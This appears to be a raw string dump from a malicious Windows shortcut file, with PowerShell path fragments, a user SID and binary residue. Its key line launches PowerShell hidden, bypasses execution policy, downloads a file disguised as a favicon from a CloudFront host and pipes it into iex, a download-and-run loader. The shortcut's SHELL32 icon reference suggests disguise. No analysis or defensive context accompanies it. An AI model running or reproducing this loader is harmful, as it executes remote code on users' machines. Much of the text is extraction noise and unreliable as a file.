Windows
OwHETVi.
System32
WindowsPowerShell
powershell.exe
<T`yET
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe
Windows
KSystem32
WindowsPowerShell
`powershell.exe
testE..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\windows\tasksz-noprofile -WindowStyle Hidden -ep bypass -c ""iwr https://d35u6pvfsr5oqz.cloudfront.net/fav.ico -o v.ico;type v.ico""|iex!%SystemRoot%\System32\SHELL32.dll
%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe
S-1-5-21-3337766276-2332526634-2776532405-1105